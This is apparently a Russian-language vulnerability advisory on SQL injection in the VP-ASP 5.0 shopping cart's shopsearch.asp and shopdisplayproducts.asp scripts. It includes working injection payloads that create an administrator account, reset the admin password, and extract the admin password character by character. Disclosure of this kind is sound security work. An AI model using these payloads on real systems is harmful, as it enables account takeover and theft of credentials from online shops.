Программа: VP-ASP 5.0 

Несколько уязвимостей обнаружено в VP-ASP shopping cart. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Уязвимость SQL инъекции обнаружена в 'shopsearch.asp' и 'shopdisplayproducts.asp' сценариях. Удаленный пользователь может выполнить произвольный SQL код на целевой базе данных, включая команды операционной
системы. 

Пример: 

-- PoC code 1:

Платформы: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account

Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='qasdew'-- &SubCategory=All&action.x=33 &action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&
SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password

Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='admin'--&SubCategory= All&action.x=33&action.y=6

-- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script

An SQL Injection vulnerability has been found in the shopdisplayproducts.asp
script. Exploitation of the vulnerability will allow remote attacker to read any
information from a database.

-- PoC code 2:
Платформы: Win32/MSSQL

http://somehost.com/vpasp/ shopdisplayproducts.asp?cat= qwerty'%20union%20select%
20fldauto,fldpassword%20from%20 tbluser%20where%20fldusername='admin'%20and %20fldpassword%20like%20'a%25'--

changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
and looking through the HTTP response from VP-ASP web server attacker can find the admin
password.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии